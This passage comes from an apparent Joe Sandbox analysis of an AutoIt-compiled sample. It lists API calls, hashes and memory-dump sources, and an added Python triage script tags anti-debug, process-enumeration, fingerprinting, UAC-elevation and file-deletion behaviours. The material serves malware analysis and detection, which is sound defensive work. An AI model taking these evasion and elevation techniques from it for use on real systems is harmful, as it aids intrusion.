                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 2649000838-1173974218
                                                                        • Opcode ID: 99195756d58f707dc2899a878fbba36eec6974351b3c0c8816cbe6503f705a46
                                                                        • Instruction ID: 3233e4d53bcf908e355854fd7d2c69f18de81b7d593b7c71e4d382b6a780847c
                                                                        • Opcode Fuzzy Hash: 99195756d58f707dc2899a878fbba36eec6974351b3c0c8816cbe6503f705a46
                                                                        • Instruction Fuzzy Hash: A031A171008349DBC311EF64C8919FFB7E8BE92200F404A2DF5E1D21A5EB39DA09D7A2
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0104416D
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0104417B
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0104419B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01044245
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 420147892-0
                                                                        • Opcode ID: 3bbb1dc3b4dd7e084703e6a9cabc9c675586b05b38b88e8258d9ffc8445c0f21
                                                                        • Instruction ID: e0b0cce7af4bfdcb5adf641e04411acdf9d845b2305951d2f31ef52cd309f2a8
                                                                        • Opcode Fuzzy Hash: 3bbb1dc3b4dd7e084703e6a9cabc9c675586b05b38b88e8258d9ffc8445c0f21
                                                                        • Instruction Fuzzy Hash: 4E31BFB11083459BD310EF64E885BBFBBE8BF85340F40062DF6C5D21A1EB75AA49CB52
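Added triage note and example (not part of the Joe Sandbox output). The entries above are auto-generated per-function API listings for module 0000001C at image base 00FE0000. The MessageBoxA text "It is a violation of the AutoIt EULA to attempt to reverse engineer this program.", the "AutoIt v3" window class passed to CreateWindowExW and the ShellExecuteW call next to the "runas" string (consistent with the interpreter's re-launch-as-administrator path) identify this module as the stock AutoIt3 interpreter, so the IsDebuggerPresent check, the GetVersionExW / IsWow64Process / GetNativeSystemInfo fingerprinting, the FindFirstFileW / DeleteFileW directory loop and the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW walk are interpreter behaviour present in any compiled AutoIt script, not logic specific to this sample. The Python script below was written for this page (it is not Joe Sandbox code) to parse lines in the shape of these "APIs" tables and tag such behaviours; its sample input is constructed from entries on this page, and the rule table is the editor's assumption, not a Joe Sandbox or Sigma signature.

```python
"""Tag behaviours in Joe Sandbox-style per-function 'APIs' listings.

Added example for this report page; the classification rules are the
editor's own heuristics, not a Joe Sandbox signature.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: lines copied in the shape of this page's APIs tables.
SAMPLE_API_LINES = """\
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FF526C
• IsDebuggerPresent.KERNEL32 ref: 00FF527E
  • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 01030B2E
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01096D10), ref: 01030BE9
• ShellExecuteW.SHELL32(00000000), ref: 01030BF0
• CreateToolhelp32Snapshot.KERNEL32 ref: 0104416D
• Process32FirstW.KERNEL32(00000000,?), ref: 0104417B
• Process32NextW.KERNEL32(00000000,?), ref: 0104419B
• GetVersionExW.KERNEL32(?), ref: 00FF5D40
• IsWow64Process.KERNEL32(00000000), ref: 00FF5E0E
• GetNativeSystemInfo.KERNEL32(00000000), ref: 00FF5E54
"""


@dataclass(frozen=True)
class ApiCall:
    name: str                 # API symbol, e.g. IsDebuggerPresent
    module: str               # module column, e.g. KERNEL32 or LIBCMT
    args: str                 # raw argument column, empty when absent
    ref: str                  # call-site address from the report
    subcall_of: Optional[str]  # caller address for "Part of subcall function" rows


# One bullet line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bullet that matches the report's API row format; skip the rest."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            calls.append(ApiCall(m["name"], m["mod"], m["args"] or "",
                                 m["ref"].upper(), m["sub"].upper() if m["sub"] else None))
    return calls


# Single-API rules (assumed heuristics): tag -> API names that imply it.
RULES = {
    "anti-debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW",
                            "Process32NextW", "Process32First", "Process32Next"},
    "environment-fingerprint": {"GetVersionExW", "IsWow64Process",
                                "GetNativeSystemInfo", "GetSystemInfo"},
}


def classify(calls: List[ApiCall], include_subcalls: bool = False) -> Dict[str, List[str]]:
    """Map behaviour tags to the call-site refs that triggered them.

    Subcall rows describe callees, so by default only the function's own
    direct calls are tagged; pass include_subcalls=True to widen the net.
    """
    own = [c for c in calls if include_subcalls or c.subcall_of is None]
    hits: Dict[str, List[str]] = {}
    for tag, names in RULES.items():
        refs = [c.ref for c in own if c.name in names]
        if refs:
            hits[tag] = refs
    present = {c.name for c in own}
    # Multi-call patterns: a directory walk that deletes what it finds.
    if {"FindFirstFileW", "DeleteFileW"} <= present:
        hits["file-deletion-loop"] = [c.ref for c in own
                                      if c.name in ("FindFirstFileW", "DeleteFileW", "FindNextFileW")]
    # The report infers arguments from the stack, so the "runas" verb may show up
    # on a neighbouring row rather than on ShellExecuteW itself; look at all rows.
    if "ShellExecuteW" in present and any("runas" in c.args.split(",") for c in own):
        hits["uac-elevation-prompt"] = [c.ref for c in own if c.name == "ShellExecuteW"]
    # The EULA message box is a fingerprint of the stock AutoIt3 interpreter.
    eula = [c.ref for c in own if c.name == "MessageBoxA" and "AutoIt EULA" in c.args]
    if eula:
        hits["autoit-runtime-stub"] = eula
    return hits


def triage(text: str) -> List[str]:
    """Sorted behaviour tags for one function's APIs listing."""
    return sorted(classify(parse_api_lines(text)))


if __name__ == "__main__":
    for tag, refs in classify(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{tag:24s} {', '.join(refs)}")
```

Run on the constructed sample it reports anti-debug, autoit-runtime-stub, environment-fingerprint, process-enumeration and uac-elevation-prompt; the subcall row (_memmove under 00FF1821) is parsed but not tagged against the caller. Feeding it the second and fourth entries above (FindFirstFileW with DeleteFileW) adds file-deletion-loop.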
                                                                        APIs
                                                                          • Part of subcall function 00FF3740: CharUpperBuffW.USER32(?,010A71DC,00000002,?,00000000,010A71DC,?,00FE53A5,?,?,?,?), ref: 00FF375D
                                                                        • _memmove.LIBCMT ref: 00FEB68A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 2819905725-0
                                                                        • Opcode ID: 4dd62541ca133d3fdfebae1b5a6c6d60d4c52aa7614df38ea456bba83d841797
                                                                        • Instruction ID: 6032a615082ec2c32359fe2c03a566576b6c747e37e56ef0aabee63f680ec212
                                                                        • Opcode Fuzzy Hash: 4dd62541ca133d3fdfebae1b5a6c6d60d4c52aa7614df38ea456bba83d841797
                                                                        • Instruction Fuzzy Hash: 1CA29B71A08391CFD721CF19C480B2BB7E1BF88314F14896DE99A8B361D779E845DB92
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,0102FC86), ref: 0104495A
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104496B
                                                                        • FindClose.KERNEL32(00000000), ref: 0104497B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: c24c6290ed47c34a76ad2fb6eb9dd109b72f2bc402e12f6f187f832598f7a912
                                                                        • Instruction ID: 959937e59f78511a3b77278b39ca7326a95bd4a5a7e45b3f834674e260b47be2
                                                                        • Opcode Fuzzy Hash: c24c6290ed47c34a76ad2fb6eb9dd109b72f2bc402e12f6f187f832598f7a912
                                                                        • Instruction Fuzzy Hash: 27E0DF76821506AB8220663CEC8D8EA779C9E07239F100B65F8B5D20C8EB74AD449796
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9190d870ceb0090d92ad782eb09280349806ea85adbccbf3feb508b00d3326a
                                                                        • Instruction ID: aec8e5f5a2eae778f56f14c89bff70984b5d034f90efc53a433dc73a8239c631
                                                                        • Opcode Fuzzy Hash: e9190d870ceb0090d92ad782eb09280349806ea85adbccbf3feb508b00d3326a
                                                                        • Instruction Fuzzy Hash: 9022EE75E08256CFDB24DF55C880BAEB7F0FF45310F14806AE8869B351D3B4A984EBA1
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00FEBF57
                                                                          • Part of subcall function 00FE52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 010236B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeekSleepTimetime
                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                        • API String ID: 1792118007-922114024
                                                                        • Opcode ID: 5927c41c4ae4592ee33692a3dfd27b58051083316100822381195211ffa974a1
                                                                        • Instruction ID: 6c953ea69cc1e3363bd12a81219463fc7fed72db775a97b8e10325f9f54c9fe9
                                                                        • Opcode Fuzzy Hash: 5927c41c4ae4592ee33692a3dfd27b58051083316100822381195211ffa974a1
                                                                        • Instruction Fuzzy Hash: 2BC2C070A08391DFD724DF25C844BAABBE5BF84304F14891DF5CA9B291CB79E845DB82

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                        • RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                        • LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: c1028778e28796c85649e74780fa3c624a799305c9097f64fd08763de4ae9fee
                                                                        • Instruction ID: eacb944c22c06d90d6025c856d23146cd8aa5b35723ee5fa0fc00d27c8fe01aa
                                                                        • Opcode Fuzzy Hash: c1028778e28796c85649e74780fa3c624a799305c9097f64fd08763de4ae9fee
                                                                        • Instruction Fuzzy Hash: 9A312B71D41309EFDB61DFA4D885AC9BBF0FB0A320F10825AF590E6294E7BA0545CF91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                        • RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                        • LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 454bf5a86de4c682937ec3eb810a98647d28dd80295060da25037796178a923a
                                                                        • Instruction ID: 9b52f8ba319158a80d79cffafd94820fa708c347681a9e5b4bff1e3e92f9ac8c
                                                                        • Opcode Fuzzy Hash: 454bf5a86de4c682937ec3eb810a98647d28dd80295060da25037796178a923a
                                                                        • Instruction Fuzzy Hash: 0921F4B1D40309AFDB20DFA4E889B9DBBF4FB09710F00821AF590A6288D7BA0544CF95

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 010000CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FF3094), ref: 010000ED
                                                                          • Part of subcall function 010008C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FF309F), ref: 010008E3
                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FF30E2
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 010301BA
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 010301FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 01030239
                                                                        • _wcscat.LIBCMT ref: 01030292
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                        • API String ID: 2673923337-2727554177
                                                                        • Opcode ID: cca48e34c9a222189ce9642d3c80b50640d2ef6293aafab00468e32d51726bd4
                                                                        • Instruction ID: fe4e1e11d18d2a21a47eac1a21818dd6a95cf472fb690ff82517cdc2b2be4520
                                                                        • Opcode Fuzzy Hash: cca48e34c9a222189ce9642d3c80b50640d2ef6293aafab00468e32d51726bd4
                                                                        • Instruction Fuzzy Hash: 7A71AB71409B059ED324EF65E8818BBBBE8FF94340F80852EF5C5C72A4EB359948CB52

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FF5156
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FF5165
                                                                        • LoadIconW.USER32(00000063), ref: 00FF517C
                                                                        • LoadIconW.USER32(000000A4), ref: 00FF518E
                                                                        • LoadIconW.USER32(000000A2), ref: 00FF51A0
                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FF51C6
                                                                        • RegisterClassExW.USER32(?), ref: 00FF521C
                                                                          • Part of subcall function 00FE3411: GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                          • Part of subcall function 00FE3411: RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                          • Part of subcall function 00FE3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                          • Part of subcall function 00FE3411: InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                          • Part of subcall function 00FE3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                          • Part of subcall function 00FE3411: LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                          • Part of subcall function 00FE3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: a95133dd97e5e6f10e99c5ad39f06a4413473048a2b0b1b1ea6aaa8dc7cf690f
                                                                        • Instruction ID: 80e60d567b6e0c31a5ee07b236fba092d6c732733bea6548d5db458eeeaf713c
                                                                        • Opcode Fuzzy Hash: a95133dd97e5e6f10e99c5ad39f06a4413473048a2b0b1b1ea6aaa8dc7cf690f
                                                                        • Instruction Fuzzy Hash: E8217C71E00708AFEB259FA4ED09B9D7BB4FB08710F40825AF684A6298D3BB5550DF84

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000101,?), ref: 01055E7E
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 01055EC3
                                                                        • gethostbyname.WS2_32(?), ref: 01055ECF
                                                                        • IcmpCreateFile.IPHLPAPI ref: 01055EDD
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01055F4D
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01055F63
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01055FD8
                                                                        • WSACleanup.WSOCK32 ref: 01055FDE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 0fe3275aac5bfee9af57bc2b6a775b6df7b0b1693cec3e16aadd022f6be19dd8
                                                                        • Instruction ID: 093e5e7654d11767ac9b35736e231612a8d21c2a2042440db37cb0249d726f7f
                                                                        • Opcode Fuzzy Hash: 0fe3275aac5bfee9af57bc2b6a775b6df7b0b1693cec3e16aadd022f6be19dd8
                                                                        • Instruction Fuzzy Hash: BC515E316042019FD7A1DF25DC49B2BBBE4EF88720F044569FAD9EB2A1DB74E900DB52

                                                                        Control-flow Graph

                                                                        [Control-flow graph rendering not preserved; legend: Executed / Not Executed. Root block ff4d83-ff4dd1; API calls shown in the graph are listed under APIs below.]
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00FF4E22
                                                                        • KillTimer.USER32(?,00000001), ref: 00FF4E4C
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FF4E6F
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF4E7A
                                                                        • CreatePopupMenu.USER32 ref: 00FF4E8E
                                                                        • PostQuitMessage.USER32(00000000), ref: 00FF4EAF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 1aeb15143a23cfa0a3a6131d21800860da8531781cecc732dcf9dbca48c68795
                                                                        • Instruction ID: 9e0441ad9fa2d4b63f572e14a3d7ad232a08ab7a320c23e22d963f199857baf9
                                                                        • Opcode Fuzzy Hash: 1aeb15143a23cfa0a3a6131d21800860da8531781cecc732dcf9dbca48c68795
                                                                        • Instruction Fuzzy Hash: FF412932A4050EABEB355F68DC09B7F7699FF81310F40421AF7C1921A9DA7BA810F761

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 01030C5B
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • _memset.LIBCMT ref: 00FF5787
                                                                        • _wcscpy.LIBCMT ref: 00FF57DB
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF57EB
                                                                        • __swprintf.LIBCMT ref: 01030CD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                        • String ID: Line %d: $AutoIt - $E#E#
                                                                        • API String ID: 230667853-1317277412
                                                                        • Opcode ID: 9041e83b7843873d7435f52d3c6ade67852d22bd3735c3197a4900c2b6ea927c
